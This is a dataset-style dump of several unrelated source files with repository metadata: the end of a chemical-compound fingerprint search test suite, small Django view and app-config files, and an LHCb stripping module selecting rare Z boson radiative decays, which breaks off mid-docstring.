logger.info("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)
def __resultContains(self, ccId, matchResultList):
for matchResult in matchResultList:
if ccId in matchResult.ccId:
return True
return False
def __getSearchDataProviders(self, **kwargs):
minCount = kwargs.get("minCount", 500)
oesmP = OeSearchMoleculeProvider(**kwargs)
ok = oesmP.testCache()
ccIdxP = ChemCompIndexProvider(**kwargs)
ok = ccIdxP.testCache(minCount=minCount)
self.assertTrue(ok)
ccIdxD = ccIdxP.getIndex()
return oesmP, ccIdxD
@unittest.skipIf(skipFlag, "Long troubleshooting test")
def testFingerPrintScoresFull(self):
"""Fingerprint scores. (full)"""
numMols = 5000
myKwargs = {
"cachePath": self.__cachePath,
"useCache": True,
"ccFileNamePrefix": "cc-full",
"oeFileNamePrefix": "oe-full",
"limitPerceptions": True,
"minCount": 500,
"maxFpResults": 50,
"fpTypeCuttoffList": self.__fpTypeCuttoffList,
"buildTypeList": self.__buildTypeList,
"failedIdList": self.__failedIdList,
}
return self.__fingerPrintScores(numMols, **myKwargs)
def __fingerPrintScores(self, numMols, **kwargs):
maxFpResults = kwargs.get("maxResults", 50)
limitPerceptions = kwargs.get("limitPerceptions", True)
fpTypeCuttoffList = kwargs.get("fpTypeCuttoffList", [("TREE", 0.6)])
buildTypeList = kwargs.get("buildTypeList", ["oe-iso-smiles"])
doDisplay = kwargs.get("doDisplay", False)
failedIdList = kwargs.get("failedIdList", [])
#
oesmP, ccIdxD = self.__getSearchDataProviders(**kwargs)
oesU = OeSearchUtils(oesmP, fpTypeList=[tup[0] for tup in fpTypeCuttoffList])
oeioU = OeIoUtils()
# This will reload the oe binary cache.
oeMol = oesmP.getMol("004")
self.assertGreaterEqual(len(list(oeMol.GetAtoms())), 12)
#
missedFpD = {}
missedBuildD = {}
numMols = min(len(ccIdxD), numMols) if numMols else len(ccIdxD)
logger.info("Begin finger print score search on %d molecules", numMols)
# ----
startTime = time.time()
# for ccId, ccD in list(ccIdxD.items())[:numMols]:
for ii, ccId in enumerate(failedIdList[:numMols]):
ccD = ccIdxD[ccId]
for buildType in buildTypeList:
if buildType in ccD:
oeMol = oeioU.descriptorToMol(ccD[buildType], buildType, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildType)
if not oeMol:
logger.debug("%s build failed for %s - skipping", ccId, buildType)
continue
maxHits = 0
minHits = maxFpResults
selfHit = False
#
startTime1 = time.time()
for fpType, minFpScore in fpTypeCuttoffList:
retStatus, mL = oesU.getFingerPrintScores(oeMol, fpType, minFpScore, maxFpResults)
self.assertTrue(retStatus)
logger.debug("%s fpType %r hits %d", ccId, fpType, len(mL))
maxHits = max(maxHits, len(mL))
minHits = min(minHits, len(mL))
matchedSelf = self.__resultContains(ccId, mL)
selfHit = selfHit or matchedSelf
if not matchedSelf:
missedFpD.setdefault(ccId, []).append((buildType, fpType, len(mL)))
#
if not selfHit:
missedBuildD.setdefault(ccId, []).append(buildType)
#
if maxHits < 1 or not selfHit:
logger.info("%s MISSED for buildType %r min hits %d max hits %d (%.4f seconds)", ccId, buildType, minHits, maxHits, time.time() - startTime1)
else:
logger.debug("%s MATCHED for buildType %r min hits %d max hits %d (%.4f seconds)", ccId, buildType, minHits, maxHits, time.time() - startTime1)
else:
logger.debug("%s missing descriptor %r", ccId, buildType)
if ii % 100 == 0:
logger.info("Completed %d of %d missed count %d in (%.4f seconds)", ii, len(failedIdList), len(missedBuildD), time.time() - startTime)
# ------
for ccId, bTL in missedBuildD.items():
logger.info("%s missed all fptypes: buildtype list %r", ccId, bTL)
if ccId in missedFpD:
logger.info("%s unmatched by fpTypes %r", ccId, missedFpD[ccId])
#
if doDisplay:
for ccId, bTL in missedBuildD.items():
idxD = ccIdxD[ccId]
if "oe-iso-smiles" in idxD:
for bT in bTL:
self.__displayAlignedDescriptorPair(ccId, idxD["oe-iso-smiles"], "oe-iso-smiles", idxD[bT], bT, title=None, limitPerceptions=True)
logger.info("%s fingerprints search on %d in (%.4f seconds)", len(fpTypeCuttoffList), numMols, time.time() - startTime)
# ---- ccId, descrRef, buildTypeRef, descrFit, buildTypeFit, title=None, limitPerceptions=True):
@unittest.skipIf(skipFlag, "Long troubleshooting test")
def testSubStructureSearchWithFpFull(self):
"""Substructure search with fingerprint prefilter. (full)"""
numMols = 5000
myKwargs = {
"cachePath": self.__cachePath,
"useCache": True,
"ccFileNamePrefix": "cc-full",
"oeFileNamePrefix": "oe-full",
"limitPerceptions": True,
"minCount": 500,
"maxFpResults": 50,
"fpTypeCuttoffList": self.__fpTypeCuttoffList,
"buildTypeList": self.__buildTypeList,
"failedIdList": self.__failedIdList,
}
return self.__sssWithFingerPrintFromDescriptor(numMols, **myKwargs)
def __sssWithFingerPrintFromDescriptor(self, numMols, **kwargs):
maxFpResults = kwargs.get("maxResults", 50)
limitPerceptions = kwargs.get("limitPerceptions", False)
fpTypeCuttoffList = kwargs.get("fpTypeCuttoffList", [("TREE", 0.6)])
buildTypeList = kwargs.get("buildTypeList", ["oe-iso-smiles"])
doDisplay = kwargs.get("doDisplay", False)
failedIdList = kwargs.get("failedIdList", [])
#
oesmP, ccIdxD = self.__getSearchDataProviders(**kwargs)
oesU = OeSearchUtils(oesmP, fpTypeList=[tup[0] for tup in fpTypeCuttoffList])
oeioU = OeIoUtils()
# This will reload the oe binary cache.
oeMol = oesmP.getMol("004")
self.assertGreaterEqual(len(list(oeMol.GetAtoms())), 12)
matchOpts = "graph-relaxed"
missTupL = []
missedD = {}
missedFpD = {}
numMols = min(len(ccIdxD), numMols) if numMols else len(ccIdxD)
logger.info("Begin substructure search w/ finger print filter on %d molecules", numMols)
# ----
startTime = time.time()
# for ccId, ccD in list(ccIdxD.items())[:numMols]:
for ii, ccId in enumerate(failedIdList[:numMols]):
ccD = ccIdxD[ccId]
for buildType in buildTypeList:
if buildType in ccD:
startTime1 = time.time()
oeMol = oeioU.descriptorToMol(ccD[buildType], buildType, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildType)
if not oeMol:
logger.debug("%s build failed for %s - skipping", ccId, buildType)
continue
maxHits = 0
minHits = maxFpResults
selfHit = False
for fpType, minFpScore in fpTypeCuttoffList:
retStatus, mL = oesU.searchSubStructureWithFingerPrint(oeMol, fpType, minFpScore, maxFpResults, matchOpts=matchOpts)
self.assertTrue(retStatus)
logger.debug("%s fpType %r hits %d", ccId, fpType, len(mL))
maxHits = max(maxHits, len(mL))
minHits = min(minHits, len(mL))
matchedSelf = self.__resultContains(ccId, mL)
selfHit = selfHit or matchedSelf
if not matchedSelf:
missedFpD.setdefault(ccId, []).append((buildType, fpType, len(mL)))
if not selfHit:
missedD.setdefault(ccId, []).append(buildType)
if maxHits < 1 or not selfHit:
logger.info("%s (%r) MISSED buildType %r min hits %d max hits %d (%.4f seconds)", ccId, selfHit, buildType, minHits, maxHits, time.time() - startTime1)
else:
logger.debug("%s (%r) MATCHED buildType %r min hits %d max hits %d (%.4f seconds)", ccId, selfHit, buildType, minHits, maxHits, time.time() - startTime1)
else:
logger.debug("%s missing descriptor %r", ccId, buildType)
if ii % 100 == 0:
logger.info("Completed %d of %d missed count %d", ii, len(failedIdList), len(missedD))
#
for ccId, missL in missedD.items():
logger.info("%s missed list %r", ccId, missL)
if ccId in missedFpD:
logger.info("%s unmatched for fpTypes %r", ccId, missedFpD[ccId])
# ----
if doDisplay:
mD = {}
for missTup in missTupL:
mD.setdefault(missTup[0], []).append(missTup[1])
for ccId, buildTypeL in mD.items():
idxD = ccIdxD[ccId]
if "oe-iso-smiles" in idxD:
for buildType in buildTypeL:
self.__displayAlignedDescriptorPair(ccId, idxD["oe-iso-smiles"], "oe-iso-smiles", idxD[buildType], buildType, title=None, limitPerceptions=True)
logger.info("%s fingerprints search on %d in (%.4f seconds)", len(fpTypeCuttoffList), numMols, time.time() - startTime)
# ---- ccId, descrRef, buildTypeRef, descrFit, buildTypeFit, title=None, limitPerceptions=True):
def __displayAlignedDescriptorPair(self, ccId, descrRef, buildTypeRef, descrFit, buildTypeFit, title=None, limitPerceptions=True):
oeioU = OeIoUtils()
oeMolRef = oeioU.descriptorToMol(descrRef, buildTypeRef, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildTypeRef)
oeMolFit = oeioU.descriptorToMol(descrFit, buildTypeFit, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildTypeFit)
#
oed = OeDepictMCSAlignPage()
oed.setSearchType(sType="relaxed", minAtomMatchFraction=0.50)
oed.setDisplayOptions(
labelAtomName=True, labelAtomCIPStereo=True, labelAtomIndex=False, labelBondIndex=False, highlightStyleFit="ballAndStickInverse", bondDisplayWidth=0.5
)
oed.setRefMol(oeMolRef, ccId)
oed.setFitMol(oeMolFit, ccId)
myTitle = title if title else buildTypeRef + "-" + buildTypeFit
imgPath = os.path.join(self.__workPath, myTitle + "-" + ccId + ".svg")
logger.info("Using image path %r", imgPath)
aML = oed.alignPair(imagePath=imgPath)
if aML:
logger.info("%s aligned image path %r", ccId, imgPath)
for (rCC, rAt, tCC, tAt) in aML:
logger.debug("%5s %-5s %5s %-5s", rCC, rAt, tCC, tAt)
def subStructureSearch():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(OeSearchIndexUtilsTests("testSubStructureSearchExhaustiveAbbrev"))
suiteSelect.addTest(OeSearchIndexUtilsTests("testSubStructureSearchWithFpAbbrev"))
suiteSelect.addTest(OeSearchIndexUtilsTests("testSubStructureSearchScreenedAbbrev"))
suiteSelect.addTest(OeSearchIndexUtilsTests("testSubStructureSearchScreenedFiltered"))
return suiteSelect
def fingerprintSearch():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(OeSearchIndexUtilsTests("testFingerPrintSearchAbbrev"))
suiteSelect.addTest(OeSearchIndexUtilsTests("testFingerPrintScoresAbbrev"))
return suiteSelect
def fullSearchTests():
suiteSelect = unittest.TestSuite()
suiteSelect.addTest(OeSearchIndexUtilsTests("testSubStructureSearchWithFpFull"))
suiteSelect.addTest(OeSearchIndexUtilsTests("testFingerPrintScoresFull"))
return suiteSelect
if __name__ == "__main__":
mySuite = fullSearchTests()
unittest.TextTestRunner(verbosity=2).run(mySuite)
| [
"john.westbrook@rcsb.org"
] | john.westbrook@rcsb.org |
883a6c20e7944bbab06ab0137f5b161f3a652d38 | 9f5bc6d70835e32a02364766b406d0cc08e45692 | /hello_dj/music/views.py | 986db014c229efe440662c4a77e9f5c3b977a2c1 | [] | no_license | zx490336534/learn_django | f206f13901a4c177bc78629b839da0b947764927 | 78274ccdb5d97b0576fa893a119dc60369300be2 | refs/heads/master | 2020-04-03T16:39:07.325023 | 2018-11-23T13:59:38 | 2018-11-23T13:59:38 | 155,413,348 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | from django.shortcuts import render
# Create your views here.
def index(request):
return render(request, 'music/music_index.html',
context={'str': 'LIST',
'format_string': '%Y年%m月%d日 %H:%M:%S',
'ls': [1, 2, 3],
'tp': ('taka', 'xiaopo', 'moran')})
| [
"490336534@qq.com"
] | 490336534@qq.com |
0582897f7a69500d2f5c4c8fa2494d17fb05329e | 9c9ea9c714eeac36a931f70d2ea7827f6390cf6e | /Pamas/pamas/apps.py | 3b3566431adf51a8b45d63f95bae648c9083ac55 | [
"MIT"
] | permissive | Kipngetich33/Patient-Management-System | fda4572dc7970b96c31da22d301851f90292f58e | 85ca9f3ba403c40ae950e7a59bdff460b5aa0a4b | refs/heads/master | 2021-04-15T09:33:21.874628 | 2018-03-27T16:18:38 | 2018-03-27T16:18:38 | 126,166,290 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | from django.apps import AppConfig
class PamasConfig(AppConfig):
name = 'pamas'
| [
"khalifngeno@gmail.com"
] | khalifngeno@gmail.com |
1647fc226c8cbc176c5b932a76f084e49407d819 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /DaVinci_v41r2/Phys/StrippingSelections/python/StrippingSelections/StrippingQEE/StrippingZ0RareDecay.py | 2c6998592537863818d578d9100d7ff0f1296b49 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,281 | py | """
Modified from StrippingRD/StrippingBeauty2XGammaExclusive.py
Module for construction of Z boson Radiative Decays Stripping Selections and StrippingLines.
Provides functions to build K*, rho, omega, D0, Jpsi, and Upsilon selections.
"""
__author__ = ['Hang Yin']
__date__ = '04/03/2016'
__version__ = '$Revision: 1.0 $'
__all__ = 'default_config', 'Z0RareDecayConf'
from Gaudi.Configuration import *
from GaudiKernel.SystemOfUnits import MeV, GeV, mm
from GaudiConfUtils.ConfigurableGenerators import FilterDesktop, CombineParticles
from PhysSelPython.Wrappers import Selection, DataOnDemand, MergedSelection
from StrippingConf.StrippingLine import StrippingLine
from StrippingUtils.Utils import LineBuilder
from StandardParticles import StdLooseAllPhotons
default_config = {
'NAME' : 'Z0RareDecay',
'BUILDERTYPE' : 'Z0RareDecayConf',
'WGs' : ['QEE'],
'STREAMS' : ['EW'],
'CONFIG' : {
'TrChi2' : 5., # dimensionless, useless (default is 4)
'VtxChi2' : 20., # dimensionless, useless (default is 4)
'RhoMassWin' : 230. * MeV,
'OmegaMassWin' : 230. * MeV,
'KstMassWin' : 120. * MeV,
'PhiMassWin' : 200. * MeV,
'D0MassWin' : 100. * MeV,
'JpsiMassMin' : 3000. * MeV,
'JpsiMassMax' : 3200. * MeV,
'UpsilonMassMin' : 8500. * MeV,
'MuonP' : -8000. * MeV,
'MuonPT' : 650. * MeV,
'photonPT' : 2500. * MeV,
'pion0PT' : 860. * MeV,
'Pi0Pi0PT' : 10000. * MeV,
'MesonPT' : 13000. * MeV,
'ZMassWin' : 60000. * MeV,
# Pre- and postscales
'Z2GammaGammaPreScale' : 1.0,
'Z2GammaGammaPostScale' : 1.0,
'Z2Pi0GammaPreScale' : 1.0,
'Z2Pi0GammaPostScale' : 1.0,
'Z2Pi0Pi0PreScale' : 1.0,
'Z2Pi0Pi0PostScale' : 1.0,
'Z2RhoGammaPreScale' : 1.0,
'Z2RhoGammaPostScale' : 1.0,
'Z2OmegaGammaPreScale' : 1.0,
'Z2OmegaGammaPostScale' : 1.0,
'Z2KstGammaPreScale' : 1.0,
'Z2KstGammaPostScale' : 1.0,
'Z2PhiGammaPreScale' : 1.0,
'Z2PhiGammaPostScale' : 1.0,
'Z2D0GammaPreScale' : 1.0,
'Z2D0GammaPostScale' : 1.0,
'Z2QONGammaPreScale' : 1.0,
'Z2QONGammaPostScale' : 1.0,
#'RawEvents' : ["Muon", "Calo", "Rich", "Velo", "Tracker"],
},
}
class Z0RareDecayConf(LineBuilder):
__configuration_keys__ = default_config['CONFIG'].keys()
def __init__(self, name, config):
LineBuilder.__init__(self, name, config)
##
## Selection of Z daughters: photon, pion0, rho, omega,
## kstar, phi, Jpsi and Upsilon
##
# make photon
selPhoton = makePhoton('PhotonSel' + name,
config['photonPT'])
selPhotonHi = makePhoton('PhotonHighSel' + name,
config['Pi0Pi0PT'])
# make pion0
selPion0 = makePion0('Pion0SelMy',
config['pion0PT'])
# make rho
selRho = makeRho('RhoSel' + name,
config['TrChi2'],
config['MesonPT'],
config['RhoMassWin'])
# make omega
selOmega = makeOmega('OmegaSel' + name,
config['MesonPT'],
config['OmegaMassWin'],
selPion0)
# make Kstar
selKst = makeKstar('KStarSel' + name,
config['TrChi2'],
config['MesonPT'],
config['KstMassWin'])
# make phi
selPhi2KK = makePhi2KK('PhiSel' + name,
config['TrChi2'],
config['MesonPT'],
config['PhiMassWin'])
# make D0
selD02KPi = makeD02KPi('D0Sel' + name,
config['TrChi2'],
config['MesonPT'],
config['D0MassWin'])
# make quarkonium
selQON = makeQON('QniumSel' + name,
config['VtxChi2'],
config['TrChi2'],
config['MesonPT'],
config['MuonPT'],
config['MuonP'],
config['JpsiMassMin'],
config['JpsiMassMax'],
config['UpsilonMassMin'])
##
## make event selections
##
# Z -> Gamma Gamma selections
selZ2GammaGamma = makeZ2GammaGamma(name + 'Z2GammaGamma',
selPhoton,
config['Pi0Pi0PT'],
config['ZMassWin'])
# Z -> Pi0 Gamma selections
selZ2Pi0Gamma = makeZ2Pi0Gamma(name + 'Z2Pi0Gamma',
selPion0,
selPhoton,
config['Pi0Pi0PT'],
config['ZMassWin'])
# Z -> Pi0 Pi0 selections
selZ2Pi0Pi0 = makeZ2Pi0Pi0(name + 'Z2Pi0Pi0',
selPion0,
config['Pi0Pi0PT'],
config['ZMassWin'])
# Z -> rho Gamma selections
selZ2RhoGamma = makeZ2RhoGamma(name + 'Z2RhoGamma',
selRho,
selPhoton,
config['ZMassWin'])
# Z -> Omega Gamma selections
selZ2OmegaGamma = makeZ2OmegaGamma(name + 'Z2OmegaGamma',
selOmega,
selPhoton,
config['ZMassWin'])
# Z ->Kst Gamma selections
selZ2KstGamma = makeZ2KstGamma(name + 'Z2KstGamma',
selKst,
selPhotonHi,
config['ZMassWin'])
# Z ->Phi Gamma selections
selZ2PhiGamma = makeZ2PhiGamma(name + 'Z2PhiGamma',
selPhi2KK,
selPhoton,
config['ZMassWin'])
# Z ->D0 Gamma selections
selZ2D0Gamma = makeZ2D0Gamma(name + 'Z2D0Gamma',
selD02KPi,
selPhoton,
config['ZMassWin'])
# Z -> Jpsi/Upsilon Gamma selections
selZ2QONGamma = makeZ2QONGamma(name + 'Z2QONGamma',
selQON,
selPhoton,
config['ZMassWin'])
##
## Stripping lines
##
# Z-> gamma gamma line
Z2GammaGammaLine = StrippingLine(name + 'Z2GammaGammaLine',
prescale=config['Z2GammaGammaPreScale'],
postscale=config['Z2GammaGammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2GammaGamma)
self.registerLine(Z2GammaGammaLine)
# Z-> pi0 gamma line
Z2Pi0GammaLine = StrippingLine(name + 'Z2Pi0GammaLine',
prescale=config['Z2Pi0GammaPreScale'],
postscale=config['Z2Pi0GammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2Pi0Gamma)
self.registerLine(Z2Pi0GammaLine)
# Z-> pi0 pi0 line
Z2Pi0Pi0Line = StrippingLine(name + 'Z2Pi0Pi0Line',
prescale=config['Z2Pi0Pi0PreScale'],
postscale=config['Z2Pi0Pi0PostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2Pi0Pi0)
self.registerLine(Z2Pi0Pi0Line)
# Z-> rho gamma line
Z2RhoGammaLine = StrippingLine(name + 'Z2RhoGammaLine',
prescale=config['Z2RhoGammaPreScale'],
postscale=config['Z2RhoGammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2RhoGamma)
self.registerLine(Z2RhoGammaLine)
# Z-> omega gamma line
Z2OmegaGammaLine = StrippingLine(name + 'Z2OmegaGammaLine',
prescale=config['Z2OmegaGammaPreScale'],
postscale=config['Z2OmegaGammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2OmegaGamma)
self.registerLine(Z2OmegaGammaLine)
# Z-> K* gamma line
Z2KstGammaLine = StrippingLine(name + 'Z2KstGammaLine',
prescale=config['Z2KstGammaPreScale'],
postscale=config['Z2KstGammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2KstGamma)
self.registerLine(Z2KstGammaLine)
# Z-> phi gamma line
Z2PhiGammaLine = StrippingLine(name + 'Z2PhiGammaLine',
prescale=config['Z2PhiGammaPreScale'],
postscale=config['Z2PhiGammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2PhiGamma)
self.registerLine(Z2PhiGammaLine)
# Z-> D0 gamma line
Z2D0GammaLine = StrippingLine(name + 'Z2D0GammaLine',
prescale=config['Z2D0GammaPreScale'],
postscale=config['Z2D0GammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2D0Gamma)
self.registerLine(Z2D0GammaLine)
# Z-> J/psi, Upsilon gamma line
Z2QONGammaLine = StrippingLine(name + 'Z2QONGammaLine',
prescale=config['Z2QONGammaPreScale'],
postscale=config['Z2QONGammaPostScale'],
#RequiredRawEvents = config['RawEvents'],
RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
selection=selZ2QONGamma)
self.registerLine(Z2QONGammaLine)
#################################################################################
def makePhoton(name, photonPT):
"""Create photon Selection object starting from DataOnDemand 'Phys/StdLooseAllPhotons'.
@arg name: name of the Selection.
@arg photonPT: PT of the photon
@return: Selection object
"""
code = "(PT> %(photonPT)s)" % locals()
gammaFilter = FilterDesktop(Code=code)
stdGamma = StdLooseAllPhotons
return Selection(name, Algorithm=gammaFilter, RequiredSelections=[stdGamma])
def makePion0(name, pion0PT):
"""Create pion0 Selection object starting for resloved and merged pi0.
@arg name: name of the Selection.
@arg pion0PT: PT of pi0
@return: Selection object
"""
from StandardParticles import StdLooseResolvedPi0 as _pi0resolved
from StandardParticles import StdLooseMergedPi0 as _pi0merged
code1 = "(PT > %(pion0PT)s)" % locals()
filter_pi0resolved = FilterDesktop(Code = code1)
selpi0resolved = Selection("Selection_"+name+"_pi0resolved", RequiredSelections=[_pi0resolved], Algorithm=filter_pi0resolved)
code2 = "(PT > %(pion0PT)s)" % locals()
filter_pi0merged = FilterDesktop(Code = code2)
selpi0merged = Selection("Selection_"+name+"_pi0merged", RequiredSelections=[_pi0merged], Algorithm=filter_pi0merged)
return MergedSelection(name, RequiredSelections=[selpi0resolved,selpi0merged])
def makeRho(name, TrChi2, MesonPT, RhoMassWin) :
"""
Create and return a rho -> pi+ pi- Selection object, starting from DataOnDemand 'Phys/StdLooseRho0'.
@arg name: name of the Selection.
@arg TrChi2: tracks chi2
@arg MesonPT: PT of combined particle
@arg RhoMassWin: rho(770)0 mass window
@return: Selection object
"""
preambulo = ["goodTrack = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
"goodRho = ((ADMASS('rho(770)0') < %(RhoMassWin)s) & (PT > %(MesonPT)s))" % locals()]
code = "goodRho & CHILDCUT( goodTrack , 1 ) & CHILDCUT( goodTrack , 2 )"
rhoFilter = FilterDesktop(Preambulo=preambulo, Code=code)
stdRho2pipi = DataOnDemand(Location="Phys/StdLooseRho0/Particles")
return Selection(name, Algorithm=rhoFilter, RequiredSelections=[stdRho2pipi])
def makeOmega(name, MesonPT, OmegaMassWin, selPion0) :
"""
Create and return a omega -> pi+ pi- pi0 Selection object, starting from DataOnDemand 'Phys/StdLoosePions'.
@arg name: name of the Selection.
@arg MesonPT: PT of combined particle
@arg OmegaMassWin: omega(782) mass window
@arg selPion0: selected pion0 candidates
@return: Selection object
"""
stdPions = DataOnDemand(Location="Phys/StdLoosePions/Particles")
omega2pipipizero = CombineParticles()
omega2pipipizero.DecayDescriptor = "omega(782) -> pi+ pi- pi0"
omega2pipipizero.CombinationCut = "(ADAMASS('omega(782)') < %(OmegaMassWin)s )" % locals()
omega2pipipizero.MotherCut = "((ADMASS('omega(782)') < %(OmegaMassWin)s ) & (PT > %(MesonPT)s))" % locals()
omegaConf = omega2pipipizero.configurable("Combine_"+name+"_PiPiPi0")
return Selection(name, Algorithm=omegaConf, RequiredSelections=[stdPions, selPion0])
def makeKstar(name, TrChi2, MesonPT, KstMassWin) :
"""
Create and return a K*->Kpi Selection object, starting from DataOnDemand 'Phys/StdVeryLooseDetachedKst2Kpi'.
@arg name: name of the Selection.
@arg TrChi2: tracks chi2
@arg KstMassWin: K* mass window
@return: Selection object
"""
preambulo = ["goodTrack = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
"goodKstar = ((ADMASS('K*(892)0') < %(KstMassWin)s) & (PT > %(MesonPT)s))" % locals()]
code = "goodKstar & CHILDCUT( goodTrack , 1 ) & CHILDCUT( goodTrack , 2 )"
kstFilter = FilterDesktop(Preambulo=preambulo, Code=code)
stdKst2Kpi = DataOnDemand(Location="Phys/StdVeryLooseDetachedKst2Kpi/Particles")
return Selection(name, Algorithm=kstFilter, RequiredSelections=[stdKst2Kpi])
def makePhi2KK(name, TrChi2, MesonPT, PhiMassWin) :
"""
Create and return a Phi->KK Selection object, starting from DataOnDemand 'Phys/StdLoosePhi2KK'.
@arg name: name of the Selection.
@arg TrChi2: minimum chi2 of the K+ tracks
@arg MesonPT: selected Phi PT
@arg PhiMassWin: selected Phi mass window
@return: Selection object
"""
preambulo = ["goodKaon = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
"goodPhi = ((ADMASS('phi(1020)') < %(PhiMassWin)s) & (PT > %(MesonPT)s))" % locals()]
code = 'goodPhi & CHILDCUT( goodKaon, 1 ) & CHILDCUT( goodKaon, 2 )'
phiFilter = FilterDesktop(Preambulo=preambulo, Code=code)
stdPhi2KK = DataOnDemand(Location="Phys/StdLoosePhi2KK/Particles")
return Selection(name, Algorithm=phiFilter, RequiredSelections=[stdPhi2KK])
def makeD02KPi(name, TrChi2, MesonPT, D0MassWin) :
"""
Create and return a D0->KPi Selection object, starting from DataOnDemand 'Phys/StdLooseD02KPi'.
@arg name: name of the Selection.
@arg TrChi2: minimum chi2 of the K+, pi tracks
@arg MesonPT: selected D0 PT
@arg D0MassWin: selected D0 mass window
@return: Selection object
"""
preambulo = ["goodKaon = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
"goodD0 = ((ADMASS('D0') < %(D0MassWin)s) & (PT > %(MesonPT)s))" % locals()]
code = 'goodD0 & CHILDCUT( goodKaon, 1 ) & CHILDCUT( goodKaon, 2 )'
D0Filter = FilterDesktop(Preambulo=preambulo, Code=code)
stdD02KPi = DataOnDemand(Location="Phys/StdLooseD02KPi/Particles")
return Selection(name, Algorithm=D0Filter, RequiredSelections=[stdD02KPi])
def makeQON(name, VtxChi2, TrChi2, MesonPT, MuonPT, MuonP, JpsiMassMin, JpsiMassMax, UpsilonMassMin) :
"""
Create and return a Jpsi-> mu mu and Upsilon -> mu mu Selection object, starting from DataOnDemand 'Phys/StdLooseDiMuon'.
@arg name: name of the Selection.
@arg VtxChi2: vertex/dof chi2
@arg TrChi2: tracks chi2
@arg MesonPT: PT of combined particle
@arg MuonPT: PT of Muon
@arg MuonP: P of Muon
@arg JpsiMassMin: Jpsi mass lower cut
@arg JpsiMassMax: Jpsi mass higher cut
@arg UpsilonMassMin: Upsilon mass lower cut
@return: Selection object
"""
MuonCut = "(MINTREE('mu+'==ABSID,PT) > %(MuonPT)s ) & (MINTREE('mu+'==ABSID,P) > %(MuonP)s ) & (MAXTREE('mu+'==ABSID,TRCHI2DOF) < %(TrChi2)s)" % locals()
MuMuCut = "(((MM > %(JpsiMassMin)s ) & (MM < %(JpsiMassMax)s )) | (MM > %(UpsilonMassMin)s )) & (VFASPF(VCHI2PDOF)< %(VtxChi2)s) & (PT > %(MesonPT)s )"%locals()
DiMuFilter = FilterDesktop(Code= MuonCut + "&" + MuMuCut)
stdDiMuon = DataOnDemand(Location="Phys/StdLooseDiMuon/Particles")
return Selection(name, Algorithm=DiMuFilter, RequiredSelections=[stdDiMuon])
####################################################################################
def makeZ2GammaGamma(name, gammaSel, Pi0Pi0PT, ZMassWin):
"""
Create and return a Z -> Gamma Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg gammaSel: photon selection
@arg Pi0Pi0PT: PT of photon
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
strCutdau = "PT > %(Pi0Pi0PT)s" % locals()
daughtersCuts = {'gamma' : strCutdau}
Z0 = CombineParticles(DecayDescriptor="Z0 -> gamma gamma",
MotherCut=motherCut,
DaughtersCuts = daughtersCuts,
ParticleCombiners = {"" : "MomentumCombiner:PUBLIC"},
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel])
def makeZ2Pi0Gamma(name, Pion0Sel, gammaSel, Pi0Pi0PT, ZMassWin):
"""
Create and return a Z -> pi0 Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg Pion0Sel: pi0 selection
@arg gammaSel: photon selection
@arg Pi0Pi0PT: PT of pi0 and photon
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
strCutdau = "PT > %(Pi0Pi0PT)s" % locals()
daughtersCuts = {'pi0' : strCutdau, 'gamma' : strCutdau}
Z0 = CombineParticles(DecayDescriptor="Z0 -> pi0 gamma",
MotherCut=motherCut,
DaughtersCuts = daughtersCuts,
ParticleCombiners = {"" : "MomentumCombiner:PUBLIC"},
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, Pion0Sel])
def makeZ2Pi0Pi0(name, Pion0Sel, Pi0Pi0PT, ZMassWin):
"""
